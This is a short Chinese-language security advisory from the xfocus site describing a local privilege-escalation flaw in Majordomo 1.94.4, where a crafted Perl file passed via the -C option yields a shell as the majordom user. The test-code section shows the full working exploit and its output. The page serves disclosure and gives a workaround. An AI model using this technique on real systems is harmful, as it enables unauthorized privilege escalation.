xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Majordomo Local -C 参数漏洞


发布时间:1999-12-29
更新时间:1999-12-29
严重程度:
威胁程度:权限提升
错误类型:设计错误
利用方式:服务器模式

受影响系统
SCO
Great Circle Associates Majordomo 1.94.4
详细描述
本地用户可以利用此漏洞获得majordomo的权限。

测试代码
可以用以下方式测试:

shevek@tirin ~$ cat foo.pl
system("/bin/csh");
shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
%
%whoami
majordom

解决方案
一个临时的解决办法是将majordomo的可执行位去除。

相关信息